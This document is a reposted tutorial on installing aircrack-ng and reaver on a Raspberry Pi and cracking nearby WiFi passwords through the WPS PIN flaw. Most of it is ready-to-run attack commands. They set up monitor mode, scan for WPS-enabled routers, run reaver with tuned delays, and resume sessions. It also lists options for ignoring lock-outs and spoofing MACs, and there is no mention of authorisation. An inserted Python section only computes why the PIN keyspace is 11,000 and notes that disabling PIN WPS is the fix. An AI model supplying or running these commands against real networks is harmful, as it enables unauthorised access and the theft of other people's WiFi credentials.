Raspberry Pi (raspberrypi): installing aircrack-ng and reaver, and a WiFi cracking tutorial [compiled]

Source: Internet
Author: User

Original link: http://www.findspace.name/res/1184

Please credit the source when reprinting.

Hardware environment

One Raspberry Pi B+ (I'm using the Debian environment)
One PC (or any other device that can be used to operate the Pi directly)
One wireless card (any card that works will do, but a more powerful card makes the job easier; I use a 3070)

Findspace note:

Not every wireless card will do: it must support monitor mode. The list of supported chipsets can be viewed here: https://wikidevi.com/wiki/Wireless_adapters/Chipset_table

Install dependent packages
sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion
sudo apt-get install libnl-3-200 libnl-3-dev libnl-3-doc libnl-genl-3-dev libnl-genl-3-200
Installing aircrack-ng
svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng/
make
sudo make install
Installing reaver
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install

Both of the source packages above can also be found here:
Baidu Network Disk share
If the installation succeeds, commands such as airmon-ng, airodump-ng and reaver will be available.

Cracking tutorial

sudo airmon-ng start wlan0
sudo airodump-ng mon0

From the airodump-ng listing above, pick a signal that is strong enough to crack (note: choose one that has WPS enabled).
Take a look at this list, which shows the wireless networks around you. Note the MB column, which shows values such as "54" or "54e.": it indicates the network's current rate mode and whether WPS is on. My own router is "Steve"; compare "54e" with "54e.": the difference is the trailing dot, and that dot indicates that WPS mode is turned on. So we are going to do a WPS probe; we have to remember the MAC address of that SSID, and then we attack and probe that MAC address.
![][3]


-vv shows the details; once you are proficient you can use -v, which is simpler. Typically -vv is used when you run into problems.
If you want to leave the machine running unattended, remember to prefix the command with nohup so that you can disconnect the SSH session. After that, the rest is just waiting.


-o writes the output to a file.
If the crack succeeds, open the output log and you can see the password that reaver recovered.
![][4]

Command description: how to use reaver:

airmon-ng start wlan0   # start the mon0 monitor interface
reaver -i mon0 -b <MAC> -a -S -vv   # general usage

If the process crashes or stops after reaching 90.9%, note the first four digits of the PIN and use:

reaver -i mon0 -b <MAC> -a -vv -p XXXX   (XXXX = the first four digits of the PIN)

Other commands

airodump-ng mon0   # scans the surrounding wireless signals
wash -i mon0 -C   # detects which surrounding routers support WPS PIN

If the PIN does not advance, try adding the -n parameter:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -n
You can also add delays with the -d and -t parameters (explained below).

Common parameter explanation

-i   the NIC's monitor interface name, usually mon0
-b   MAC address of the target AP
-a   automatically detect the best configuration for the target AP
-S   use small DH keys to improve cracking speed
-vv  show more non-critical warnings
-d   delay between attempts; the default is 1 second per attempt, and -d 0 removes it:
reaver -i mon0 -b <MAC> -d 0
The above greatly speeds up cracking, but some APs may not cope with it.
-c   (followed by a channel number) specify the channel, so the signal is found more easily
-p   a known 4- or 8-digit PIN: with the first 4 digits reaver starts searching from that number, and with all 8 digits it can recover the password directly
-N   do not send NACK messages (try this parameter if the PIN does not advance)
-n   always send NACKs to the target AP; the default is auto
-t   the maximum time to wait for a response on each attempt; if the signal is good you can set it shorter, for example:
reaver -i mon0 -b <MAC> -d 0 -t .5
-m, --mac=   specify the local MAC address; needed when the AP uses MAC filtering

Summary: the cracking parameters should be adjusted according to the conditions:

Very good signal:
reaver -i mon0 -b <MAC> -a -S -vv -d 0 -c 1
Normal signal:
reaver -i mon0 -b <MAC> -a -S -vv -d 5 -t .5 -c 1
Weak signal:
reaver -i mon0 -b <MAC> -a -S -vv -c 1

You can press Ctrl+C to pause once a percentage is shown; reaver saves its progress file in
Version 1.3:
/etc/reaver/<MAC address>.wpc
Version 1.4:
/usr/local/etc/reaver/<MAC address>.wpc
Using the file manager, manually copy the file named after the MAC address to a USB flash drive or a hard disk.
After the next reboot, manually copy it back into the /etc/reaver/ directory.

Not all routers support PIN cracking. If the AP has WPS turned off, or has no QSS at all, the following will appear:
Warning:failed to associate with XX:XX:XX:XX:XX:XX (ESSID:XXXX)
During the run you can also press Ctrl+C to stop cracking; if the same PIN code repeats or you keep getting timeouts you can stop as well, and reaver will save its progress automatically.
To continue the previous cracking run, enter in the terminal again:
reaver -i mon0 -b <MAC> -vv
When this command is issued you will be asked Y or n; Y continues.
Once reaver has determined the first 4 digits of the PIN, its progress value jumps directly to more than 90.9%, that is, only the remaining 1000 password combinations are left (11,000 passwords in total).
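The jump to 90.9% and the total of 11,000 follow from how the WPS external-registrar PIN is designed. The Python example below is added here and is not part of the original tutorial or of reaver's code; it reproduces those numbers from two facts taken from the Wi-Fi Simple Configuration specification: the eighth PIN digit is a checksum over the first seven, and the AP confirms the first four digits (message M4) before the last four (message M6), so the two halves can be searched independently. The function names are my own and nothing touches the network. This is also the reason the defender's fix is to disable PIN-based WPS on the router (push-button only, or WPS off entirely), and why the lock-out that the --lock-delay option waits for exists.

```python
"""Why a WPS external-registrar PIN has only 11,000 effective candidates.

Added illustration of the numbers quoted in the tutorial (90.9 %, 1,000
remaining, 11,000 in total). The check-digit rule is the one in the Wi-Fi
Simple Configuration specification; the split verification (M4 confirms the
first half, M6 the second) is protocol behaviour, not anything from reaver.
"""


def wps_checksum(first7: int) -> int:
    """Return the 8th (check) digit for a 7-digit PIN prefix.

    Digits are weighted 3, 1, 3, 1, ... starting from the least significant
    digit, and the check digit makes the weighted sum a multiple of 10.
    """
    if not 0 <= first7 < 10_000_000:
        raise ValueError("prefix must be 7 digits")
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum(int(pin[:7]))


def count_valid_pins_with_prefix_below(limit: int) -> int:
    """Exhaustively count valid 8-digit PINs whose 7-digit prefix is < limit.

    Exactly one check digit fits each prefix, so the result equals limit;
    this is the brute-force confirmation of the analytic 10**7 figure below.
    """
    return sum(
        is_valid_pin(f"{prefix:07d}{check}")
        for prefix in range(limit)
        for check in range(10)
    )


def keyspace(split_verification: bool) -> int:
    """Number of PIN guesses needed in the worst case.

    Without the protocol flaw every valid 8-digit PIN (10**7 of them) would
    have to be tried. Because the AP answers the first four digits (M4) and
    the last four (M6) separately, and the last digit is the checksum, the
    halves are searched independently: 10**4 + 10**3 = 11,000.
    """
    if split_verification:
        return 10**4 + 10**3
    return 10**7


def progress_when_first_half_known() -> float:
    """Fraction of the worst-case work done once the first half is confirmed."""
    return 10**4 / keyspace(True)


def remaining_after_first_half() -> int:
    """Guesses still needed once the first four digits are known (the -p case)."""
    return keyspace(True) - 10**4


if __name__ == "__main__":
    # Constructed sample prefix; 12345670 is the resulting 8-digit PIN.
    print(f"check digit for prefix 1234567: {wps_checksum(1234567)}")
    print(f"valid PINs among prefixes 0..9999: {count_valid_pins_with_prefix_below(10_000)}")
    print(f"full keyspace: {keyspace(False):,}; split keyspace: {keyspace(True):,}")
    print(f"progress once first half is known: {progress_when_first_half_known():.1%}")
    print(f"guesses remaining after first half: {remaining_after_first_half()}")
```

Running it shows that exactly one check digit fits each 7-digit prefix, so there are 10^7 valid PINs, and that the split verification collapses those to 11,000 guesses: 10,000 of them (90.9%) are spent on the first half and only 1,000 on the second, which is exactly the progress jump the tutorial describes.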

Detailed parameter descriptions:
-m, --mac=  MAC of the host system
Specify the local MAC address; needed when the AP uses MAC filtering
-e, --essid=  ESSID of the target AP
ESSID of the router, usually not specified
-c, --channel=  Set the 802.11 channel for the interface (implies -f)
Channel of the signal; if not specified it is scanned automatically
-o, --out-file=  Send output to a log file [stdout]
Standard output to a file
-s, --session=  Restore a previous session file
Restore a progress file
-C, --exec=  Execute the supplied command upon successful pin recovery
Execute a command after the PIN is recovered
-D, --daemonize  Daemonize reaver
Run reaver as a daemon
-a, --auto  Auto detect the best advanced options for the target AP
Automatically detect the advanced parameters for the target AP
-f, --fixed  Disable channel hopping
No channel hopping
-5, --5ghz  Use 5GHz 802.11 channels
Use 5 GHz channels
-v, --verbose  Display non-critical warnings (-vv for more)
Show unimportant warning messages; -vv shows more
-q, --quiet  Only display critical messages
Show only critical information
-h, --help  Show help
Show help

Advanced parameters:
-p, --pin=  Use the specified 4 or 8 digit WPS pin
Use a known 4- or 8-digit PIN directly (my test of this was unsuccessful; I recommend using the network card's software to obtain it)
-d, --delay=  Set the delay between pin attempts [1]
Delay between PINs, default 1 second; setting 0 is recommended
-l, --lock-delay=  Set the time to wait if the AP locks WPS pin attempts [60]
Wait time after the AP locks WPS
-g, --max-attempts=  Quit after num pin attempts
Maximum number of PIN attempts
-x, --fail-wait=  Set the time to sleep after 10 unexpected failures [0]
Wait time after 10 unexpected failures, default 0 seconds
-r, --recurring-delay=  Sleep for y seconds every x pin attempts
Wait y seconds after every x PINs
-t, --timeout=  Set the receive timeout period [5]
Receive timeout, default 5 seconds
-T, --m57-timeout=  Set the M5/M7 timeout period [0.20]
M5/M7 timeout, default 0.2 seconds
-A, --no-associate  Do not associate with the AP (association must be done by another application)
Do not associate with the AP (another program must perform the association)
-N, --no-nacks  Do not send NACK messages when out of order packets are received
Do not send NACK messages (try this parameter if the PIN stays stuck)
-S, --dh-small  Use small DH keys to improve crack speed
Use small DH key values to increase speed (recommended)
-L, --ignore-locks  Ignore locked state reported by the target AP
Ignore the locked state reported by the target AP
-E, --eap-terminate  Terminate each WPS session with an EAP FAIL packet
End each WPS session by sending an EAP FAIL packet
-n, --nack  Target AP always sends a NACK [Auto]
Always send NACKs to the target AP, default auto
-w, --win7  Mimic a Windows 7 registrar [False]
Mimic a Windows 7 registrar, default off


[3]: http://lok.me/wp-content/uploads/2014/11/2.png
[4]: http://lok.me/wp-content/uploads/2014/11/3.png
